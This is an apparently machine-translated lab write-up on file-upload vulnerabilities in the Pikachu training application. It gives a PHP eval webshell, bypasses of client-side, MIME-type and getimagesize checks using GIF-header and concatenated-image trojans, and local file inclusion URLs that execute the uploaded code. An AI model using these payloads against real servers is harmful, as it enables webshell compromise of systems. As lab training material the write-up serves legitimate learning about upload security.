Article directory
The file upload function is very common in web application systems. For example, many websites need to upload avatars, upload attachments, etc. when registering. When the user clicks the upload button, the background will judge the uploaded file
For example, whether it is the specified type, suffix name, size, etc., and then rename it according to the designed format and store it in the specified directory.
If the background does not make any security judgments on the uploaded files or the judgment conditions are not rigorous enough, the attacker may upload some malicious files, such as a one-word Trojan horse, which will cause the background server to be webshelled.
Therefore, when designing the file upload function, we must strictly consider the security of the incoming files. for example:
--Verify the file type, suffix name, size;
--Verify the upload method of the file;
--Rename the file in a certain complicated way;
--Do not expose the path after the file is uploaded;
client check
upload a word trojan horse1.php
<?php eval(@$_POST['password']);?>
The error message shows that it does not meet the requirements
Check the page code and find that there is jsa function for verification
The front-end verification is not worth mentioning, just delete itjs校验函数
At this time, the one-word Trojan horse has been uploaded, and you can connect to it through the ant sword
Trojan upload path
192.168.80.139/pikachu/vul/unsafeupload/uploads/1.php
MIME Type
MIME (Multipurpose Internet Mail Extensions) is a way to set a file with a certain extension to be opened with an application. When the extension file is accessed, the browser will automatically use the specified application to open it. It is mostly used to specify some client-defined file names and some media file opening methods.
Each MIME type consists of two parts. The front is a large category of data, such as sound audio, image image, etc., and the specific type is defined later, common MIME types, such as:
HTML text.html texthtml
plain text.txt text/plain
RTF text.rtf application/rtf
GIF graphics.gif image/gif
JPEG graphics.ipeg.jpg image/jpeg
Continue to submit the php Trojan file, use Burpsuitethe grab data package, and send it to Repeaterthe modificationContent-Type
getimagesize
GetimagesizeIt is PHPa function provided to judge whether the target file is a picture
The beginning content of the file is detected and whether it is an image is identified through binary, then the file header can be used to spoof to invalidate the getimagesize() function detection.
1. Make picture Trojan horse method 1
Here use the GIF file header, add the GIF file header logo before the one-word Trojan horse, and change the suffix to png format
GIF89a
<?php phpinfo(); ?>
The address saved after the picture is uploaded:http://192.168.80.139/pikachu/vul/unsafeupload/uploads/2023/08/16/33780664dccf36108f6808817624.png
Access backdoor files by using file include paths
http://192.168.80.139/pikachu/vul/fileinclude/fi_local.php?filename=../../unsafeupload/uploads/2023/08/16/33780664dccf36108f6808817624.png&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2
2. Make picture Trojan horse method 2
Prepare a jpegpicture in a format and a php Trojan file
CMDCombining the two into one through the command ws.jpeg, the content in the front of the generated file is , and the content 2.jpegin the back12.php
copy /d 2.jpeg + 12.php ws.jpeg
upload ws.jpegpicture
uploads/2023/08/16/38476764dcd1bd7cf51012008763.jpeg
Although we bypassed getimagesize()and uploaded the picture successfully, but only accessing the code in the picture phpcannot be executed
You need to access the Trojan file through the file inclusion path
http://192.168.80.139/pikachu/vul/fileinclude/fi_local.php?filename=../../unsafeupload/uploads/2023/08/16/38476764dcd1bd7cf51012008763.jpeg&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2
